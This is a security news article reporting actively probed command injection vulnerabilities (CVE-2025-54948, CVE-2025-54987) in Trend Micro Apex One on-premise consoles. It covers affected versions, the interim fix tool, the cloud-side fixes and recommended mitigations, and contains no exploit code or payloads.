Active Exploits Target Trend Micro Apex One Flaws (CVE-2025-54948, CVE-2025-54987)
▼ Summary
– Trend Micro warns of active probing for unauthenticated command injection vulnerabilities (CVE-2025-54948, CVE-2025-54987) in its Apex One on-premise platform.
– A patch is expected by mid-August 2025, but a temporary “fix tool” is available, though it disables the Remote Install Agent function.
– The vulnerabilities allow remote code execution due to improper validation of user-supplied strings in the Apex One console, affecting specific versions and CPU architectures.
– Attackers have attempted to exploit these vulnerabilities, with access to the Management Console being a prerequisite for successful exploitation.
– Organizations are urged to apply the temporary fix, restrict console access, and install the upcoming patch to restore full functionality.
Security teams are on high alert as attackers actively probe critical vulnerabilities in Trend Micro’s Apex One endpoint protection platform. Two unpatched flaws tracked as CVE-2025-54948 and CVE-2025-54987 could allow remote code execution on affected systems, putting organizations at risk until a permanent fix arrives in mid-August 2025.
Trend Micro has confirmed these command injection vulnerabilities exist in the on-premise version of Apex One, specifically impacting Management Console versions 20216 and below. While a full patch is still weeks away, the company has released an interim mitigation tool that disables the vulnerable Remote Install Agent feature. Administrators should apply this workaround immediately, though it temporarily restricts agent deployment capabilities.
How the Exploits Work
Both vulnerabilities stem from insufficient input validation in the Apex One console, which typically listens on TCP ports 8080 and 4343. Attackers could craft malicious requests to execute arbitrary commands with the privileges of the IUSR account. This could lead to full system compromise if exploited successfully.
Cloud-based versions of Apex One and Trend Vision One were also affected, but Trend Micro deployed server-side fixes for these SaaS offerings on July 31, 2025. The on-premise variants remain exposed until the upcoming patch.
Active Exploitation Observed
Security researcher Jacky Hsieh of CoreCloud Tech discovered the flaws and reported them through the Zero Day Initiative (ZDI) on August 1, 2025. Trend Micro has since detected at least one attempted exploit in the wild, though details remain scarce.
While exploitation requires access to the management console, organizations with externally exposed interfaces face heightened risk. Trend Micro advises restricting console access through network controls until the permanent update arrives.
Recommended Actions
Apply the temporary fix tool immediately: The final update will automatically re-enable the Remote Install Agent function disabled by the interim fix. Until then, security teams should treat these vulnerabilities as a high-priority threat given active probing by malicious actors.
For real-time updates on emerging threats, subscribe to our security alert service and stay ahead of the latest vulnerabilities impacting enterprise systems.
(Source: HelpNet Security)
